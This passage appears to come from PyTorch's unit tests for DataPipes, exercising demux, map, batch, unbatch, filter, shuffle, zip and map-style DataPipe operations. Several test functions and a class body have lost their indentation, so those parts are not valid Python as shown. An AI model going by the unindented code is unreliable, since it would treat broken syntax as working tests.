            self.assertEqual(len(wa), 1)
            self.assertRegex(str(wa[0].message), r"Unlimited buffer size is set")
        output1, output2 = list(dp1), list(dp2)
        self.assertEqual(list(range(5, 10)), output1)
        self.assertEqual(list(range(0, 5)), output2)
        # Test Case: classifier returns a value outside of [0, num_instance - 1]
        dp0 = input_dp.demux(num_instances=1, classifier_fn=lambda x: x % 2)
        it = iter(dp0[0])
        with self.assertRaises(ValueError):
            # First next() yields 0 (class 0); the second sees class 1, which is out of range
            next(it)
            next(it)
        # Test Case: DataPipe doesn't reset when it has not been read
        dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
        i1 = iter(dp1)
        output2 = []
        i = 0  # NOTE(review): dead assignment — `i` is immediately rebound by the loop below
        for i, n2 in enumerate(dp2):
            output2.append(n2)
            if i == 4:
                i1 = iter(dp1)
        self.assertEqual(list(range(1, 10, 2)), output2)
        # Test Case: DataPipe reset when some of it has been read
        dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
        output1, output2 = [], []
        for n1, n2 in zip(dp1, dp2):
            output1.append(n1)
            output2.append(n2)
            if n1 == 4:
                break
        with warnings.catch_warnings(record=True) as wa:
            i1 = iter(dp1)  # Reset all child DataPipes
            self.assertEqual(len(wa), 1)
            self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
        for n1, n2 in zip(dp1, dp2):
            output1.append(n1)
            output2.append(n2)
        self.assertEqual([0, 2, 4] + list(range(0, 10, 2)), output1)
        self.assertEqual([1, 3, 5] + list(range(1, 10, 2)), output2)
        # Test Case: DataPipe reset, even when not all child DataPipes are exhausted
        dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
        output1 = list(dp1)
        self.assertEqual(list(range(0, 10, 2)), output1)
        with warnings.catch_warnings(record=True) as wa:
            self.assertEqual(list(range(0, 10, 2)), list(dp1))  # Reset even when dp2 is not read
            self.assertEqual(len(wa), 1)
            self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
        output2 = []
        for i, n2 in enumerate(dp2):
            output2.append(n2)
            if i == 1:
                self.assertEqual(list(range(1, 5, 2)), output2)
                with warnings.catch_warnings(record=True) as wa:
                    self.assertEqual(list(range(0, 10, 2)), list(dp1))  # Can reset even when dp2 is partially read
                    self.assertEqual(len(wa), 1)
                    self.assertRegex(str(wa[0].message), r"Some child DataPipes are not exhausted")
                break
        output2 = list(dp2)  # output2 has to read from beginning again
        self.assertEqual(list(range(1, 10, 2)), output2)
        # Test Case: drop_none = True (elements classified as None are silently dropped)
        dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2 if x % 5 != 0 else None,
                                  drop_none=True)
        self.assertEqual([2, 4, 6, 8], list(dp1))
        self.assertEqual([1, 3, 7, 9], list(dp2))
        # Test Case: drop_none = False (a None classification raises at iteration time)
        dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2 if x % 5 != 0 else None,
                                  drop_none=False)
        it1 = iter(dp1)
        with self.assertRaises(ValueError):
            next(it1)
        # Test Case: __len__ not implemented
        dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=lambda x: x % 2)
        with self.assertRaises(TypeError):
            len(dp1)  # It is not implemented as we do not know length for each child in advance
        with self.assertRaises(TypeError):
            len(dp2)
        # Pickle Test:
        dp1, dp2 = input_dp.demux(num_instances=2, classifier_fn=odd_or_even)
        traverse(dp1)  # This should not raise any error
        for _ in zip(dp1, dp2):
            pass
        traverse(dp2)  # This should not raise any error either
    @suppress_warnings  # Suppress warning for lambda fn
    def test_map_datapipe(self):
        """Mapper over an IterDataPipe: plain fn, fn_args/fn_kwargs forwarding, partial, and no-len sources."""
        input_dp = dp.iter.IterableWrapper(range(10))
        def fn(item, dtype=torch.float, *, sum=False):
            # Converts the item to a tensor; optionally reduces it to a scalar sum.
            data = torch.tensor(item, dtype=dtype)
            return data if not sum else data.sum()
        map_dp = input_dp.map(fn)
        self.assertEqual(len(input_dp), len(map_dp))
        for x, y in zip(map_dp, input_dp):
            self.assertEqual(x, torch.tensor(y, dtype=torch.float))
        # Extra positional/keyword arguments forwarded via fn_args/fn_kwargs
        map_dp = input_dp.map(fn=fn, fn_args=(torch.int, ), fn_kwargs={'sum': True})
        self.assertEqual(len(input_dp), len(map_dp))
        for x, y in zip(map_dp, input_dp):
            self.assertEqual(x, torch.tensor(y, dtype=torch.int).sum())
        # functools.partial is an equivalent, picklable alternative to fn_args/fn_kwargs
        from functools import partial
        map_dp = input_dp.map(partial(fn, dtype=torch.int, sum=True))
        self.assertEqual(len(input_dp), len(map_dp))
        for x, y in zip(map_dp, input_dp):
            self.assertEqual(x, torch.tensor(y, dtype=torch.int).sum())
        # Mapping over a source without __len__: iteration works but len() raises
        input_dp_nl = IDP_NoLen(range(10))
        map_dp_nl = input_dp_nl.map(lambda x: x)
        with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
            len(map_dp_nl)
        for x, y in zip(map_dp_nl, input_dp_nl):
            self.assertEqual(x, torch.tensor(y, dtype=torch.float))
    @suppress_warnings  # Suppress warning for lambda fn
    def test_map_tuple_list_with_col_datapipe(self):
        """Mapper with input_col/output_col selection over tuple- and list-shaped rows."""
        def fn_11(d):
            # 1 input column -> 1 output value
            return -d
        def fn_1n(d):
            # 1 input column -> n output values
            return -d, d
        def fn_n1(d0, d1):
            # n input columns -> 1 output value
            return d0 + d1
        def fn_nn(d0, d1):
            # n input columns -> n output values
            return -d0, -d1, d0 + d1
        def _helper(ref_fn, fn, input_col=None, output_col=None):
            # Applies `fn` via column selection and compares against the row-level
            # reference `ref_fn`, for both list and tuple rows; second pass checks reset.
            for constr in (list, tuple):
                datapipe = dp.iter.IterableWrapper([constr((0, 1, 2)), constr((3, 4, 5)), constr((6, 7, 8))])
                res_dp = datapipe.map(fn, input_col, output_col)
                ref_dp = datapipe.map(ref_fn)
                self.assertEqual(list(res_dp), list(ref_dp))
                # Reset
                self.assertEqual(list(res_dp), list(ref_dp))
        # Replacing with one input column and default output column
        _helper(lambda data: (data[0], -data[1], data[2]), fn_11, 1)
        _helper(lambda data: (data[0], (-data[1], data[1]), data[2]), fn_1n, 1)
        # The index of input column is out of range
        with self.assertRaises(IndexError):
            _helper(None, fn_1n, 3)
        # Unmatched input columns with fn arguments
        with self.assertRaises(TypeError):
            _helper(None, fn_n1, 1)
        # Replacing with multiple input columns and default output column (the left-most input column)
        _helper(lambda data: (data[1], data[2] + data[0]), fn_n1, [2, 0])
        _helper(lambda data: (data[0], (-data[2], -data[1], data[2] + data[1])), fn_nn, [2, 1])
        # output_col can only be specified when input_col is not None
        with self.assertRaises(ValueError):
            _helper(None, fn_n1, None, 1)
        # output_col can only be single-element list or tuple
        with self.assertRaises(ValueError):
            _helper(None, fn_n1, None, [0, 1])
        # Single-element list as output_col
        _helper(lambda data: (-data[1], data[1], data[2]), fn_11, 1, [0])
        # Replacing with one input column and single specified output column
        _helper(lambda data: (-data[1], data[1], data[2]), fn_11, 1, 0)
        _helper(lambda data: (data[0], data[1], (-data[1], data[1])), fn_1n, 1, 2)
        # The index of output column is out of range
        with self.assertRaises(IndexError):
            _helper(None, fn_1n, 1, 3)
        _helper(lambda data: (data[0], data[0] + data[2], data[2]), fn_n1, [0, 2], 1)
        _helper(lambda data: ((-data[1], -data[2], data[1] + data[2]), data[1], data[2]), fn_nn, [1, 2], 0)
        # Appending the output at the end
        _helper(lambda data: (*data, -data[1]), fn_11, 1, -1)
        _helper(lambda data: (*data, (-data[1], data[1])), fn_1n, 1, -1)
        _helper(lambda data: (*data, data[0] + data[2]), fn_n1, [0, 2], -1)
        _helper(lambda data: (*data, (-data[1], -data[2], data[1] + data[2])), fn_nn, [1, 2], -1)
    @suppress_warnings  # Suppress warning for lambda fn
    def test_map_dict_with_col_datapipe(self):
        """Mapper with input_col/output_col selection over dict-shaped rows (keys as columns)."""
        def fn_11(d):
            # 1 input column -> 1 output value
            return -d
        def fn_1n(d):
            # 1 input column -> n output values
            return -d, d
        def fn_n1(d0, d1):
            # n input columns -> 1 output value
            return d0 + d1
        def fn_nn(d0, d1):
            # n input columns -> n output values
            return -d0, -d1, d0 + d1
        # Prevent modification in-place to support resetting
        def _dict_update(data, newdata, remove_idx=None):
            _data = dict(data)
            _data.update(newdata)
            if remove_idx:
                for idx in remove_idx:
                    del _data[idx]
            return _data
        def _helper(ref_fn, fn, input_col=None, output_col=None):
            # Compares column-selected mapping against the row-level reference;
            # the second comparison exercises reset.
            datapipe = dp.iter.IterableWrapper(
                [{"x": 0, "y": 1, "z": 2},
                 {"x": 3, "y": 4, "z": 5},
                 {"x": 6, "y": 7, "z": 8}]
            )
            res_dp = datapipe.map(fn, input_col, output_col)
            ref_dp = datapipe.map(ref_fn)
            self.assertEqual(list(res_dp), list(ref_dp))
            # Reset
            self.assertEqual(list(res_dp), list(ref_dp))
        # Replacing with one input column and default output column
        _helper(lambda data: _dict_update(data, {"y": -data["y"]}), fn_11, "y")
        _helper(lambda data: _dict_update(data, {"y": (-data["y"], data["y"])}), fn_1n, "y")
        # The key of input column is not in dict
        with self.assertRaises(KeyError):
            _helper(None, fn_1n, "a")
        # Unmatched input columns with fn arguments
        with self.assertRaises(TypeError):
            _helper(None, fn_n1, "y")
        # Replacing with multiple input columns and default output column (the left-most input column)
        _helper(lambda data: _dict_update(data, {"z": data["x"] + data["z"]}, ["x"]), fn_n1, ["z", "x"])
        _helper(lambda data: _dict_update(data, {"z": (-data["z"], -data["y"], data["y"] + data["z"])}, ["y"]), fn_nn, ["z", "y"])
        # output_col can only be specified when input_col is not None
        with self.assertRaises(ValueError):
            _helper(None, fn_n1, None, "x")
        # output_col can only be single-element list or tuple
        with self.assertRaises(ValueError):
            _helper(None, fn_n1, None, ["x", "y"])
        # Single-element list as output_col
        _helper(lambda data: _dict_update(data, {"x": -data["y"]}), fn_11, "y", ["x"])
        # Replacing with one input column and single specified output column
        _helper(lambda data: _dict_update(data, {"x": -data["y"]}), fn_11, "y", "x")
        _helper(lambda data: _dict_update(data, {"z": (-data["y"], data["y"])}), fn_1n, "y", "z")
        _helper(lambda data: _dict_update(data, {"y": data["x"] + data["z"]}), fn_n1, ["x", "z"], "y")
        _helper(lambda data: _dict_update(data, {"x": (-data["y"], -data["z"], data["y"] + data["z"])}), fn_nn, ["y", "z"], "x")
        # Adding new key to dict for the output
        _helper(lambda data: _dict_update(data, {"a": -data["y"]}), fn_11, "y", "a")
        _helper(lambda data: _dict_update(data, {"a": (-data["y"], data["y"])}), fn_1n, "y", "a")
        _helper(lambda data: _dict_update(data, {"a": data["x"] + data["z"]}), fn_n1, ["x", "z"], "a")
        _helper(lambda data: _dict_update(data, {"a": (-data["y"], -data["z"], data["y"] + data["z"])}), fn_nn, ["y", "z"], "a")
    # TODO(VitalyFedyunin): If dill installed this test fails
    def _test_map_datapipe_nested_level(self):
        """Mapper with nesting_level: applies fn at a given depth of nested lists (disabled; see TODO)."""
        input_dp = dp.iter.IterableWrapper([list(range(10)) for _ in range(3)])
        def fn(item, *, dtype=torch.float):
            return torch.tensor(item, dtype=dtype)
        # nesting_level=0 applies the fn to the whole (list) element; lambda triggers a pickle warning
        with warnings.catch_warnings(record=True) as wa:
            map_dp = input_dp.map(lambda ls: ls * 2, nesting_level=0)
            self.assertEqual(len(wa), 1)
            self.assertRegex(str(wa[0].message), r"^Lambda function is not supported for pickle")
        self.assertEqual(len(input_dp), len(map_dp))
        for x, y in zip(map_dp, input_dp):
            self.assertEqual(x, y * 2)
        # nesting_level=1 applies the fn to items one level down (each int in each list)
        map_dp = input_dp.map(fn, nesting_level=1)
        self.assertEqual(len(input_dp), len(map_dp))
        for x, y in zip(map_dp, input_dp):
            self.assertEqual(len(x), len(y))
            for a, b in zip(x, y):
                self.assertEqual(a, torch.tensor(b, dtype=torch.float))
        # nesting_level=-1 recurses to the deepest level
        map_dp = input_dp.map(fn, nesting_level=-1)
        self.assertEqual(len(input_dp), len(map_dp))
        for x, y in zip(map_dp, input_dp):
            self.assertEqual(len(x), len(y))
            for a, b in zip(x, y):
                self.assertEqual(a, torch.tensor(b, dtype=torch.float))
        # A nesting level deeper than the data raises during iteration
        map_dp = input_dp.map(fn, nesting_level=4)
        with self.assertRaises(IndexError):
            list(map_dp)
        # Levels below -1 are rejected at construction
        with self.assertRaises(ValueError):
            input_dp.map(fn, nesting_level=-2)
def test_collate_datapipe(self):
arrs = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
input_dp = dp.iter.IterableWrapper(arrs)
def _collate_fn(batch):
return torch.tensor(sum(batch), dtype=torch.float)
collate_dp = input_dp.collate(collate_fn=_collate_fn)
self.assertEqual(len(input_dp), len(collate_dp))
for x, y in zip(collate_dp, input_dp):
self.assertEqual(x, torch.tensor(sum(y), dtype=torch.float))
input_dp_nl = IDP_NoLen(arrs)
collate_dp_nl = input_dp_nl.collate()
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(collate_dp_nl)
for x, y in zip(collate_dp_nl, input_dp_nl):
self.assertEqual(x, torch.tensor(y))
def test_batch_datapipe(self):
arrs = list(range(10))
input_dp = dp.iter.IterableWrapper(arrs)
with self.assertRaises(AssertionError):
input_dp.batch(batch_size=0)
# Default not drop the last batch
bs = 3
batch_dp = input_dp.batch(batch_size=bs)
self.assertEqual(len(batch_dp), 4)
for i, batch in enumerate(batch_dp):
self.assertEqual(len(batch), 1 if i == 3 else bs)
self.assertEqual(batch, arrs[i * bs: i * bs + len(batch)])
# Drop the last batch
bs = 4
batch_dp = input_dp.batch(batch_size=bs, drop_last=True)
self.assertEqual(len(batch_dp), 2)
for i, batch in enumerate(batch_dp):
self.assertEqual(len(batch), bs)
self.assertEqual(batch, arrs[i * bs: i * bs + len(batch)])
input_dp_nl = IDP_NoLen(range(10))
batch_dp_nl = input_dp_nl.batch(batch_size=2)
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(batch_dp_nl)
    def test_unbatch_datapipe(self):
        """UnBatcher: flattening one or more nesting levels, and invalid unbatch_level values."""
        target_length = 6
        prebatch_dp = dp.iter.IterableWrapper(range(target_length))
        # Batch then unbatch round-trips to the original elements
        input_dp = prebatch_dp.batch(3)
        unbatch_dp = input_dp.unbatch()
        self.assertEqual(len(list(unbatch_dp)), target_length)
        for i, res in zip(prebatch_dp, unbatch_dp):
            self.assertEqual(i, res)
        # Unbatching pre-built nested lists behaves the same
        input_dp = dp.iter.IterableWrapper([[0, 1, 2], [3, 4, 5]])
        unbatch_dp = input_dp.unbatch()
        self.assertEqual(len(list(unbatch_dp)), target_length)
        for i, res in zip(prebatch_dp, unbatch_dp):
            self.assertEqual(i, res)
        # Default unbatch removes exactly one level of nesting
        input_dp = dp.iter.IterableWrapper([[[0, 1], [2, 3]], [[4, 5], [6, 7]]])
        unbatch_dp = input_dp.unbatch()
        expected_dp = [[0, 1], [2, 3], [4, 5], [6, 7]]
        self.assertEqual(len(list(unbatch_dp)), 4)
        for i, res in zip(expected_dp, unbatch_dp):
            self.assertEqual(i, res)
        # unbatch_level=2 flattens two levels at once
        unbatch_dp = input_dp.unbatch(unbatch_level=2)
        expected_dp2 = [0, 1, 2, 3, 4, 5, 6, 7]
        self.assertEqual(len(list(unbatch_dp)), 8)
        for i, res in zip(expected_dp2, unbatch_dp):
            self.assertEqual(i, res)
        # unbatch_level=-1 flattens all levels
        unbatch_dp = input_dp.unbatch(unbatch_level=-1)
        self.assertEqual(len(list(unbatch_dp)), 8)
        for i, res in zip(expected_dp2, unbatch_dp):
            self.assertEqual(i, res)
        input_dp = dp.iter.IterableWrapper([[0, 1, 2], [3, 4, 5]])
        # Levels below -1 are invalid and raise during iteration
        with self.assertRaises(ValueError):
            unbatch_dp = input_dp.unbatch(unbatch_level=-2)
            for i in unbatch_dp:
                print(i)
        # A level deeper than the data raises IndexError during iteration
        with self.assertRaises(IndexError):
            unbatch_dp = input_dp.unbatch(unbatch_level=5)
            for i in unbatch_dp:
                print(i)
    def test_bucket_batch_datapipe(self):
        """BucketBatcher: size validation, length behavior, and sortedness of batches/buckets."""
        input_dp = dp.iter.IterableWrapper(range(20))
        with self.assertRaises(AssertionError):
            dp.iter.BucketBatcher(input_dp, batch_size=0)
        # A source without __len__ yields a length-less bucket batcher
        input_dp_nl = IDP_NoLen(range(20))
        bucket_dp_nl = dp.iter.BucketBatcher(input_dp_nl, batch_size=7)
        with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
            len(bucket_dp_nl)
        def _helper(**kwargs):
            # Shuffles 100 ints, bucket-batches them, and verifies every batch
            # (and every bucket of batches) comes out sorted by the sort_key.
            data_len = 100
            arrs = list(range(data_len))
            random.shuffle(arrs)
            input_dp = dp.iter.IterableWrapper(arrs)
            bucket_dp = dp.iter.BucketBatcher(input_dp, **kwargs)
            self.assertEqual(len(bucket_dp), data_len // 3 if kwargs['drop_last'] else data_len // 3 + 1)
            def _verify_bucket_sorted(bucket):
                # Sort batch in a bucket
                bucket = sorted(bucket, key=lambda x: x[0])
                flat = [item for batch in bucket for item in batch]
                # Elements in the bucket should be sorted
                self.assertEqual(flat, sorted(flat))
            batch_num = kwargs['batch_num'] if 'batch_num' in kwargs else 100
            bucket = []
            for idx, d in enumerate(bucket_dp):
                self.assertEqual(d, sorted(d))
                bucket.append(d)
                if idx % batch_num == batch_num - 1:
                    _verify_bucket_sorted(bucket)
                    bucket = []
            _verify_bucket_sorted(bucket)
        def _sort_fn(data):
            return sorted(data)
        # In-batch shuffle
        _helper(batch_size=3, drop_last=False, batch_num=5, sort_key=_sort_fn)
        _helper(batch_size=3, drop_last=False, batch_num=2, bucket_num=2, sort_key=_sort_fn)
        _helper(batch_size=3, drop_last=True, batch_num=2, sort_key=_sort_fn)
        _helper(batch_size=3, drop_last=True, batch_num=2, bucket_num=2, sort_key=_sort_fn)
def test_filter_datapipe(self):
input_ds = dp.iter.IterableWrapper(range(10))
def _filter_fn(data, val, clip=False):
if clip:
return data >= val
return True
filter_dp = input_ds.filter(filter_fn=_filter_fn, fn_args=(5, ))
for data, exp in zip(filter_dp, range(10)):
self.assertEqual(data, exp)
filter_dp = input_ds.filter(filter_fn=_filter_fn, fn_kwargs={'val': 5, 'clip': True})
for data, exp in zip(filter_dp, range(5, 10)):
self.assertEqual(data, exp)
with self.assertRaisesRegex(TypeError, r"has no len"):
len(filter_dp)
def _non_bool_fn(data):
return 1
filter_dp = input_ds.filter(filter_fn=_non_bool_fn)
with self.assertRaises(ValueError):
temp = list(filter_dp)
    def test_filter_datapipe_nested_list(self):
        """Filter with nesting_level: filtering inside nested batches, drop_empty_batches, errors."""
        input_ds = dp.iter.IterableWrapper(range(10)).batch(5)
        def _filter_fn(data, val):
            return data >= val
        # nesting_level=-1 filters at the deepest level; empty batches are dropped by default
        filter_dp = input_ds.filter(nesting_level=-1, filter_fn=_filter_fn, fn_kwargs={'val': 5})
        expected_dp1 = [[5, 6, 7, 8, 9]]
        self.assertEqual(len(list(filter_dp)), len(expected_dp1))
        for data, exp in zip(filter_dp, expected_dp1):
            self.assertEqual(data, exp)
        # drop_empty_batches=False keeps fully-filtered batches as empty lists
        filter_dp = input_ds.filter(nesting_level=-1, drop_empty_batches=False,
                                    filter_fn=_filter_fn, fn_kwargs={'val': 5})
        expected_dp2: List[List[int]] = [[], [5, 6, 7, 8, 9]]
        self.assertEqual(len(list(filter_dp)), len(expected_dp2))
        for data, exp in zip(filter_dp, expected_dp2):
            self.assertEqual(data, exp)
        # A nesting level deeper than the data raises during iteration
        with self.assertRaises(IndexError):
            filter_dp = input_ds.filter(nesting_level=5, filter_fn=_filter_fn, fn_kwargs={'val': 5})
            temp = list(filter_dp)
        # Default nesting level filters whole batches by the predicate
        input_ds = dp.iter.IterableWrapper(range(10)).batch(3)
        filter_dp = input_ds.filter(lambda ls: len(ls) >= 3)
        expected_dp3: List[List[int]] = [[0, 1, 2], [3, 4, 5], [6, 7, 8]]
        self.assertEqual(len(list(filter_dp)), len(expected_dp3))
        for data, exp in zip(filter_dp, expected_dp3):
            self.assertEqual(data, exp)
        # Deep filtering on doubly-nested input, empty inner lists dropped
        input_ds = dp.iter.IterableWrapper([[[0, 1, 2], [3, 4, 5]], [[6, 7, 8], [1, 2, 3]]])
        filter_dp = input_ds.filter(lambda x: x > 3, nesting_level=-1)
        expected_dp4 = [[[4, 5]], [[6, 7, 8]]]
        self.assertEqual(len(list(filter_dp)), len(expected_dp4))
        for data2, exp2 in zip(filter_dp, expected_dp4):
            self.assertEqual(data2, exp2)
        input_ds = dp.iter.IterableWrapper([[[0, 1, 2], [3, 4, 5]], [[6, 7, 8], [1, 2, 3]]])
        filter_dp = input_ds.filter(lambda x: x > 7, nesting_level=-1)
        expected_dp5 = [[[8]]]
        self.assertEqual(len(list(filter_dp)), len(expected_dp5))
        for data2, exp2 in zip(filter_dp, expected_dp5):
            self.assertEqual(data2, exp2)
        # nesting_level=1 filters the inner lists (one level down) by length
        input_ds = dp.iter.IterableWrapper([[[0, 1], [3, 4]], [[6, 7, 8], [1, 2, 3]]])
        filter_dp = input_ds.filter(lambda ls: len(ls) >= 3, nesting_level=1)
        expected_dp6 = [[[6, 7, 8], [1, 2, 3]]]
        self.assertEqual(len(list(filter_dp)), len(expected_dp6))
        for data2, exp2 in zip(filter_dp, expected_dp6):
            self.assertEqual(data2, exp2)
def test_sampler_datapipe(self):
input_dp = dp.iter.IterableWrapper(range(10))
# Default SequentialSampler
sampled_dp = dp.iter.Sampler(input_dp) # type: ignore[var-annotated]
self.assertEqual(len(sampled_dp), 10)
for i, x in enumerate(sampled_dp):
self.assertEqual(x, i)
# RandomSampler
random_sampled_dp = dp.iter.Sampler(input_dp, sampler=RandomSampler, sampler_kwargs={'replacement': True}) # type: ignore[var-annotated] # noqa: B950
# Requires `__len__` to build SamplerDataPipe
input_dp_nolen = IDP_NoLen(range(10))
with self.assertRaises(AssertionError):
sampled_dp = dp.iter.Sampler(input_dp_nolen)
    def test_shuffle_datapipe(self):
        """Shuffler: buffer-size validation, permutation property, seed determinism with DataLoader."""
        exp = list(range(20))
        input_ds = dp.iter.IterableWrapper(exp)
        # buffer_size must be positive
        with self.assertRaises(AssertionError):
            shuffle_dp = input_ds.shuffle(buffer_size=0)
        # Buffer smaller than, equal to, and larger than the dataset
        for bs in (5, 20, 25):
            shuffle_dp = input_ds.shuffle(buffer_size=bs)
            self.assertEqual(len(shuffle_dp), len(input_ds))
            random.seed(123)
            res = list(shuffle_dp)
            # Output is a permutation of the input
            self.assertEqual(sorted(res), exp)
            # Test Deterministic: same global seed reproduces the same order through DataLoader
            for num_workers in (0, 1):
                random.seed(123)
                dl = DataLoader(shuffle_dp, num_workers=num_workers, worker_init_fn=_worker_init_fn)
                dl_res = list(dl)
                self.assertEqual(res, dl_res)
        # Shuffling a source without __len__ keeps iteration working but len() raises
        shuffle_dp_nl = IDP_NoLen(range(20)).shuffle(buffer_size=5)
        with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
            len(shuffle_dp_nl)
def test_zip_datapipe(self):
with self.assertRaises(TypeError):
dp.iter.Zipper(dp.iter.IterableWrapper(range(10)), list(range(10))) # type: ignore[arg-type]
zipped_dp = dp.iter.Zipper(dp.iter.IterableWrapper(range(10)), IDP_NoLen(range(5))) # type: ignore[var-annotated]
with self.assertRaisesRegex(TypeError, r"instance doesn't have valid length$"):
len(zipped_dp)
exp = list((i, i) for i in range(5))
self.assertEqual(list(zipped_dp), exp)
zipped_dp = dp.iter.Zipper(dp.iter.IterableWrapper(range(10)), dp.iter.IterableWrapper(range(5)))
self.assertEqual(len(zipped_dp), 5)
self.assertEqual(list(zipped_dp), exp)
# Reset
self.assertEqual(list(zipped_dp), exp)
class TestFunctionalMapDataPipe(TestCase):
# TODO(VitalyFedyunin): If dill installed this test fails
def _test_picklable(self):
arr = range(10)
picklable_datapipes: List[
Tuple[Type[MapDataPipe], MapDataPipe, Tuple, Dict[str, Any]]
] = [
(dp.map.Mapper, dp.map.SequenceWrapper(arr), (), {}),
(dp.map.Mapper, dp.map.SequenceWrapper(arr), (_fake_fn, (0,), {'test': True}), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in picklable_datapipes:
p = pickle.dumps(dpipe(input_dp, *dp_args, **dp_kwargs)) # type: ignore[call-arg]
unpicklable_datapipes: List[
Tuple[Type[MapDataPipe], MapDataPipe, Tuple, Dict[str, Any]]
] = [
(dp.map.Mapper, dp.map.SequenceWrapper(arr), (lambda x: x,), {}),
]
for dpipe, input_dp, dp_args, dp_kwargs in unpicklable_datapipes:
with warnings.catch_warnings(record=True) as wa:
datapipe = dpipe(input_dp, *dp_args, **dp_kwargs) # type: ignore[call-arg]
self.assertEqual(len(wa), 1)
self.assertRegex(
str(wa[0].message), r"^Lambda function is not supported for pickle"
)
with self.assertRaises(AttributeError):
p = pickle.dumps(datapipe)
def test_sequence_wrapper_datapipe(self):
seq = list(range(10))
input_dp = dp.map.SequenceWrapper(seq)
# Functional Test: all elements are equal in the same order
self.assertEqual(seq, list(input_dp))
# Functional Test: confirm deepcopy works by default
seq.append(11)
self.assertEqual(list(range(10)), list(input_dp)) # input_dp shouldn't have 11
# Functional Test: non-deepcopy version is working
seq2 = [1, 2, 3]
input_dp_non_deep = dp.map.SequenceWrapper(seq2, deepcopy=False)
seq2.append(4)
self.assertEqual(list(seq2), list(input_dp_non_deep)) # should have 4
# Reset Test: reset the DataPipe
seq = list(range(10))
n_elements_before_reset = 5
res_before_reset, res_after_reset = reset_after_n_next_calls(input_dp, n_elements_before_reset)
self.assertEqual(list(range(5)), res_before_reset)
self.assertEqual(seq, res_after_reset)
# __len__ Test: inherits length from sequence
self.assertEqual(len(seq), len(input_dp))
def test_concat_datapipe(self):
input_dp1 = dp.map.SequenceWrapper(range(10))
input_dp2 = dp.map.SequenceWrapper(range(5))
with self.assertRaisesRegex(ValueError, r"Expected at least one DataPipe"):
dp.map.Concater()
with self.assertRaisesRegex(TypeError, r"Expected all inputs to be `MapDataPipe`"):
dp.map.Concater(input_dp1, ()) # type: ignore[arg-type]
concat_dp = input_dp1.concat(input_dp2)
self.assertEqual(len(concat_dp), 15)
for index in range(15):
self.assertEqual(concat_dp[index], (list(range(10)) + list(range(5)))[index])
self.assertEqual(list(concat_dp), list(range(10)) + list(range(5)))
def test_zip_datapipe(self):
input_dp1 = dp.map.SequenceWrapper(range(10))
input_dp2 = dp.map.SequenceWrapper(range(5))
input_dp3 = dp.map.SequenceWrapper(range(15))
# Functional Test: requires at least one input DataPipe
with self.assertRaisesRegex(ValueError, r"Expected at least one DataPipe"):
dp.map.Zipper()
# Functional Test: all inputs must be MapDataPipes
with self.assertRaisesRegex(TypeError, r"Expected all inputs to be `MapDataPipe`"):
dp.map.Zipper(input_dp1, ()) # type: ignore[arg-type]
# Functional Test: Zip the elements up as a tuples
zip_dp = input_dp1.zip(input_dp2, input_dp3)
self.assertEqual([(i, i, i) for i in range(5)], [zip_dp[i] for i in range(5)])
# Functional Test: Raise IndexError when index equal or exceed the length of the shortest DataPipe
with self.assertRaisesRegex(IndexError, r"out of range"):
input_dp1.zip(input_dp2, input_dp3)[5]
# __len__ Test: returns the length of the shortest DataPipe
zip_dp = input_dp1.zip(input_dp2, input_dp3)
self.assertEqual(5, len(zip_dp))
    def test_map_datapipe(self):
        """MapDataPipe.map: plain fn, fn_args/fn_kwargs forwarding, and functools.partial."""
        arr = range(10)
        input_dp = dp.map.SequenceWrapper(arr)
        def fn(item, dtype=torch.float, *, sum=False):
            # Helper: tensor-ify the item, optionally reducing it to its sum.
            data = torch.tensor(item, dtype=dtype)
            return data if not sum else data.sum()
        # Default arguments: one float tensor per element, length preserved.
        map_dp = input_dp.map(fn)
        self.assertEqual(len(input_dp), len(map_dp))
        for index in arr:
            self.assertEqual(
                map_dp[index], torch.tensor(input_dp[index], dtype=torch.float)
            )
        # Extra positional/keyword arguments forwarded via fn_args / fn_kwargs.
        map_dp = input_dp.map(fn=fn, fn_args=(torch.int,), fn_kwargs={'sum': True})
        self.assertEqual(len(input_dp), len(map_dp))
        for index in arr:
            self.assertEqual(
                map_dp[index], torch.tensor(input_dp[index], dtype=torch.int).sum()
            )
        # Same effect achieved with functools.partial instead of fn_args/fn_kwargs.
        from functools import partial
        map_dp = input_dp.map(partial(fn, dtype=torch.int, sum=True))
        self.assertEqual(len(input_dp), len(map_dp))
        for index in arr:
            self.assertEqual(
                map_dp[index], torch.tensor(input_dp[index], dtype=torch.int).sum()
            )
    def test_batch_datapipe(self):
        """MapDataPipe batching: default batches, drop_last, nesting, reset, and len."""
        arr = list(range(13))
        input_dp = dp.map.SequenceWrapper(arr)
        # Functional Test: batches top level by default (last batch may be short)
        batch_dp = dp.map.Batcher(input_dp, batch_size=2)
        self.assertEqual([[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10, 11], [12]], list(batch_dp))
        # Functional Test: drop_last on command
        batch_dp = dp.map.Batcher(input_dp, batch_size=2, drop_last=True)
        self.assertEqual([[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10, 11]], list(batch_dp))
        # Functional Test: nested batching (batches of batches)
        batch_dp_2 = batch_dp.batch(batch_size=3)
        self.assertEqual([[[0, 1], [2, 3], [4, 5]], [[6, 7], [8, 9], [10, 11]]], list(batch_dp_2))
        # Reset Test: interrupt iteration mid-way, then confirm a fresh full pass
        n_elements_before_reset = 3
        res_before_reset, res_after_reset = reset_after_n_next_calls(batch_dp, n_elements_before_reset)
        self.assertEqual([[0, 1], [2, 3], [4, 5]], res_before_reset)
        self.assertEqual([[0, 1], [2, 3], [4, 5], [6, 7], [8, 9], [10, 11]], res_after_reset)
